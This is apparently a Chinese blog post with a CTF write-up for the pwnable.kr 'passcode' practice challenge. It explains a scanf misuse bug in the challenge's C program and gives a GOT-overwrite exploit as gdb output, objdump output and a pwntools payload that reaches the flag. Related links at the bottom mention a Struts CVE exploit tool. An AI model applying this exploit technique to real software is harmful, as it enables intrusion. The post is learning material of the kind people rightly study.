PWN学习之[Toddler''s Bottle]-[passcode]

最新推荐文章于 2022-06-30 14:44:45 发布
最新推荐文章于 2022-06-30 14:44:45 发布
阅读量489 收藏
点赞数
分类专栏: pwn 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Magic1an/article/details/77418334
版权

打开passcode.c,可以看到源码如下: 

#include <stdio.h>
#include <stdlib.h>

void login(){
    int passcode1;
    int passcode2;

    printf("enter passcode1 : ");
    scanf("%d", passcode1);
    fflush(stdin);

    // ha! mommy told me that 32bit is vulnerable to bruteforcing :)
    printf("enter passcode2 : ");
        scanf("%d", passcode2);

    printf("checking...\n");
    if(passcode1==338150 && passcode2==13371337){
                printf("Login OK!\n");
                system("/bin/cat flag");
        }
        else{
                printf("Login Failed!\n");
        exit(0);
        }
}

void welcome(){
    char name[100];
    printf("enter you name : ");
    scanf("%100s", name);
    printf("Welcome %s!\n", name);
}

int main(){
    printf("Toddler's Secure Login System 1.0 beta.\n");

    welcome();
    login();

    // something after login...
    printf("Now I can safely trust you that you have credential :)\n");
    return 0;   
}

观察login()函数,可以看到在输入passcode1和passcode2时,由于scanf的变量没有使用&,执行scanf函数时,会将passcode当作地址执行。

使用gdb调试程序,奇怪的事情出现了,发现login和welcome函数的ebp相同。
经过计算发现,name(ebp-0x70)与passcode1(ebp-0x10)只相差96,而输入name时,scanf的长度限制为100,所以我们可以通过name来更改passcode1的值。

因此,我们可以利用got表复写技术,将printf,scanf等在程序中调用的函数在got表中的值改掉,这样程序调用函数时,通过got表就会进行到更改后的地址。

我们先通过objdump -R passcode 查看一下程序中函数在got中的地址。

passcode:     file format elf32-i386

DYNAMIC RELOCATION RECORDS
OFFSET   TYPE              VALUE 
08049ff0 R_386_GLOB_DAT    __gmon_start__
0804a02c R_386_COPY        stdin@@GLIBC_2.0
0804a000 R_386_JUMP_SLOT   printf@GLIBC_2.0
0804a004 R_386_JUMP_SLOT   fflush@GLIBC_2.0
0804a008 R_386_JUMP_SLOT   __stack_chk_fail@GLIBC_2.4
0804a00c R_386_JUMP_SLOT   puts@GLIBC_2.0
0804a010 R_386_JUMP_SLOT   system@GLIBC_2.0
0804a014 R_386_JUMP_SLOT   __gmon_start__
0804a018 R_386_JUMP_SLOT   exit@GLIBC_2.0
0804a01c R_386_JUMP_SLOT   __libc_start_main@GLIBC_2.0
0804a020 R_386_JUMP_SLOT   __isoc99_scanf@GLIBC_2.7

看一下login函数

(gdb) disas login
Dump of assembler code for function login:
   0x08048564 <+0>: push   %ebp
   0x08048565 <+1>: mov    %esp,%ebp
   0x08048567 <+3>: sub    $0x28,%esp
   0x0804856a <+6>: mov    $0x8048770,%eax
   0x0804856f <+11>:    mov    %eax,(%esp)
   0x08048572 <+14>:    call   0x8048420 <printf@plt>
   0x08048577 <+19>:    mov    $0x8048783,%eax
   0x0804857c <+24>:    mov    -0x10(%ebp),%edx
   0x0804857f <+27>:    mov    %edx,0x4(%esp)
   0x08048583 <+31>:    mov    %eax,(%esp)
   0x08048586 <+34>:    call   0x80484a0 <__isoc99_scanf@plt>
   0x0804858b <+39>:    mov    0x804a02c,%eax
   0x08048590 <+44>:    mov    %eax,(%esp)
   0x08048593 <+47>:    call   0x8048430 <fflush@plt>
   0x08048598 <+52>:    mov    $0x8048786,%eax
   0x0804859d <+57>:    mov    %eax,(%esp)
   0x080485a0 <+60>:    call   0x8048420 <printf@plt>
   0x080485a5 <+65>:    mov    $0x8048783,%eax
   0x080485aa <+70>:    mov    -0xc(%ebp),%edx
   0x080485ad <+73>:    mov    %edx,0x4(%esp)
   0x080485b1 <+77>:    mov    %eax,(%esp)
   0x080485b4 <+80>:    call   0x80484a0 <__isoc99_scanf@plt>
   0x080485b9 <+85>:    movl   $0x8048799,(%esp)
   0x080485c0 <+92>:    call   0x8048450 <puts@plt>
   0x080485c5 <+97>:    cmpl   $0x528e6,-0x10(%ebp)
   0x080485cc <+104>:   jne    0x80485f1 <login+141>
   0x080485ce <+106>:   cmpl   $0xcc07c9,-0xc(%ebp)
   0x080485d5 <+113>:   jne    0x80485f1 <login+141>
   0x080485d7 <+115>:   movl   $0x80487a5,(%esp)
   0x080485de <+122>:   call   0x8048450 <puts@plt>
   0x080485e3 <+127>:   movl   $0x80487af,(%esp)  //我们将要跳转的地方既got表修改后的值
   0x080485ea <+134>:   call   0x8048460 <system@plt>
   0x080485ef <+139>:   leave  
   0x080485f0 <+140>:   ret    
   0x080485f1 <+141>:   movl   $0x80487bd,(%esp)
   0x080485f8 <+148>:   call   0x8048450 <puts@plt>
   0x080485fd <+153>:   movl   $0x0,(%esp)
---Type <return> to continue, or q <return> to quit---
   0x08048604 <+160>:   call   0x8048480 <exit@plt>
End of assembler dump.

我们选用printf函数,因此我们的payload即为
payload=’a’*96//填充name首地址与passcode1的空间
+0x804a000//更改passcode 为printf的地址
+134514147 //0x80485e3既system(“/bin/cat flag”) 因为scanf函数输入的是%d,所以采用十进制

>>> from pwn import *
>>> p=0x804a000
>>> s=0x80485e3
>>> paylode='a'*96+p32(p)+str(s)
>>> e=process("./passcode")
[x] Starting local process './passcode'
[+] Starting local process './passcode': Done
>>> e.sendline(paylode)
>>> e.recvline()
[*] Process './passcode' stopped with exit code 0
"Toddler's Secure Login System 1.0 beta.\n"
>>> e.recvline()
'enter you name : Welcome aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!\n'
>>> e.recvline()
'Sorry mom.. I got confused about scanf usage :(\n'
>>>

得到如上Sorry mom ..的flag

欢迎访问本人原博客查看更多文章 Magician.

Magic1an
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PWN passcode [pwnable.kr]CTF writeup题解系列5
重新启程
01-01 872
直接看题目: 连接服务器看看情况: root@mypwn:/ctf/work/pwnable.kr# ssh passcode@pwnable.kr -p2222 passcode@pwnable.kr's password: ____ __ __ ____ ____ ____ _ ___ __ _ ____ | \|...
pwnable 笔记 Toddler's Bottle - passcode
HiTaQini
11-03 2912
这题涉及到GOT覆写技术,我更新了一篇讲GOT覆写的文章,以这道题做的例子,讲的比较详细,大家可以参考一下: http://blog.csdn.net/smalosnail/article/details/53247502
[Toddler's Bottle]fd
jmp esp
04-17 427
题目描述解题过程0x01ssh 进入到目标服务器 输入password0x02ls 查看服务器上的文件 发现 0x03cat flag 失败 permission denied cat fd.c 太显然了。。 输入的参数减去0x1234(4660十进制)之后作为文件描述符读入 然后和LETMEWIN比较 如果相同就可以得到flag了0x04关键在这里!fd=0 是stdin fd=1 是
[Toddler's Bottle]-[flag]
ACdream
05-10 788
这个7分的题其实很脑洞 方法很简单:拖入IDA中查找字符串 看到什么熟悉的东西了吗?对,upx 肯定是upx加壳处理过的 那么呢,需要百度一发找工具呗,linux下的upx加壳脱壳工具就这个: sudo apt-get install upx 在terminal下输入upx查找使用方法 脱壳命令是-d upx -d flag就可以把文件脱壳
pwnable.kr [Toddler's Bottle] - lotto
Re:Umiade.tr
03-22 799
Mommy! I made a lotto program for my homework. do you want to play? ssh lotto@pwnable.kr -p2222 (pw:guest) 同样是一个小游戏,考查…细心程度。源码如下:#include <stdio.h> #include <stdlib.h> #include <string.h> #incl
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
struts-pwn:Apache Struts CVE-2017-5638的漏洞利用
05-18
python struts-pwn.py --list 'urls.txt' -c 'id' 检查针对单个URL的漏洞是否存在。 python struts-pwn.py --check --url 'http://example.com/struts2-showcase/index.action' 根据URL列表检查漏洞是否存在。 ...
pwn题目中的libc-2.27.so文件
04-11
pwn题,有些时候题目不给这个文件,这里是这个库的文件。
PWN入门之数组越界-附件资源
03-05
PWN入门之数组越界-附件资源
Pwnable之[Toddler's Bottle](三)--memcpy
杀生丸?不,其实我要的是桔梗
03-30 377
Pwnable之[Toddler’s Bottle](三)–memcpy 提示是: Are you tired of hacking?, take some rest here. Just help me out with my small experiment regarding memcpy performance. after that, flag is yours. 黑累了吗?...
乱七八糟的pwn入门(六)——5.passcode
Z_Pathon的博客
09-02 641
审题 首先看题目: 连上服务器,看一下这次的代码: #include <stdio.h> #include <stdlib.h> void login(){ int passcode1; int passcode2; printf("enter passcode1 : "); scanf("%d", passcode1); fflus...
PWN学习之[Toddler''s Bottle]-[fd]
Magic1an的博客
08-19 358
在linux命令行界面输入ssh fd@pwnable.kr -p2222 密码为guest链接上后发现目录下有fd fd.c和flag三个文件,直接cat flag查看flag会显示无权限,必须通过fd可执行文件进行获取flag.查看fd.c,源码比较简单#include <stdio.h> #include <stdlib.h> #include <string.h> char buf[32]
Pwnable之[Toddler's Bottle](二)
杀生丸?不,其实我要的是桔梗
03-11 321
Pwnable之[Toddler’s Bottle](2) Pwn挑战地址 11.coin1 nc 连上。 要你玩一个游戏,游戏的规则是: 你手里拿了几枚金币。 然而,其中有一枚假币。 假币和真币一模一样。 然而,它的重量不同于真正的重量。 真币重10,假币重达9 帮我找一个带刻度的假币 如果你发现100个假币,你将得到奖励: 还有,你有30秒的时间。 比如,n=...
pwnable.kr [Toddler's Bottle] - codemap
Re:Umiade.tr
06-02 1058
写在最前:想要成为安全大牛的愿望还是这么遥不可及。 渐渐地,没有什么忧虑的大学生活也好像开始有了一些属于小人物的忐忑。 还是坚信自己很厉害,可是道路前方仍是一篇迷蒙。感谢帮助过我的前辈,以及让我可以暂时不考虑经济压力的父母。 I have a binary that has a lot information inside heap. How fast can you reverse-
pwnable.kr之Toddler‘s Bottle 9~16题知识点记录
weixin_42877778的博客
06-30 363
pwnable.kr的8~16题知识点记录
[Toddler's Bottle]-collision
ACdream
04-23 541
慢慢来学习linux
[Toddler's Bottle]-[bof]
ACdream
05-04 728
linux下的所谓的简单的缓冲区溢出的题 这是题目链接中给的bof.c源代码 #include #include #include void func(int key){ char overflowme[32]; printf("overflow me : "); gets(overflowme); // smash me! if(key == 0xcafebabe)
Pwnable】[Toddler's Bottle]--bof
VZZmieshenquan的博客
02-15 165
Description: Nana told me that buffer overflow is one of the most common software vulnerability. Is that true? Download : http://pwnable.kr/bin/bof Download : http://pwnable.kr/bin/bof.c Running at :...
PWN学习之[Toddler''s Bottle]-[bof]
Magic1an的博客
08-19 482
将bof和bof.c文件下载下来 #include <stdio.h> #include <string.h> #include <stdlib.h> void func(int key){ char overflowme[32]; printf("overflow me : "); gets(overflowme); // smash me! if(key ==
mqtt-pwn安装
最新发布
09-20
安装mqtt-pwn的步骤如下: 1. 克隆mqtt-pwn仓库:使用命令`git clone https://github.com/akamai-threat-research/mqtt-pwn.git`将mqtt-pwn仓库克隆到本地。 2. 进入mqtt-pwn目录:使用命令`cd mqtt-pwn`进入mqtt-...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值